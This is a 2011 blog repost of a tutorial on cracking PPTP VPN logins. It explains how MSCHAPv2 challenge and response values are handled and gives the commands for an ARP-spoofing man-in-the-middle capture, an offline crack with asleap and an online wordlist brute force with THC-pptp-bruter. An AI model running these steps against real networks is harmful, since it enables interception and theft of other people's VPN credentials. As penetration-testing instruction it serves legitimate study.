Monday, September 12, 2011

HOWTO : Cracking PPTP VPNs with asleap and THC-pptp-bruter

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : g0tmi1k

This is g0tmi1k's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

The original post at here


Watch on-line
Download Video
Script (

What is this?

A python script, to automatically generate the arguments for Joshua Wright's 'asleap' program.

This video demostrates an offline (asleap) and online (THC-pptp-bruter) attack on MSCHAP v2 software VPN.

How does this work?

From wireshark (and a Man In The Middle attack), you can get "CHAP Challenge" and "CHAP Response". We can break theses values down:

CHAP Challenge = Auth Challenge (16 bytes)
CHAP Response = Peer Challenge (16 bytes) and Peer Response (24 bytes)

After finding "Auth Challenge and Peer Challenge" we can add these to the username and hash (sha1)the result. This will generate the "Challenge".

Once we have the challenge, we can feed this into the asleap, along with CHAP Challenge.

This script does all the work for you (and more), it just needs the values from wireshark for it to work. As well as having the option for different styles of attack, you can either uses a dictionary/wordlist or use 'Genkeys' to generate a look up file for asleap (which is recommended). Also by using this, you can automatically run asleap with your arguments.

What do I need?

The script -

Name: asleap
Version: 2.2
Home Page:
Download Link:

Name: THC-pptp-bruter
Version: 0.1.4
Home Page:
Download Link:

Version: 0.1.1
Home Page:
Download Link:

How to use
1.) chmod 755
2.) python


echo 1 > /proc/sys/net/ipv4/ip_forward

arpspoof -i eth1 -t

arpspoof -i eth1 -t

wireshark -i eth1 -k

python -u g0tmi1k -c 3fb0e397540e8aa3df5eb08b0053092c -r df7661696051401f7192726630558ac200000000000000003c4b7c76ae82dd3050006c53d0bc6012db000acba0c5fec600 -x -v

cd /pentest/passwords/wordlists
cat darkc0de.lst | thc-pptp-bruter -u g0tmi1k -n 99 -l 999

That's all! See you.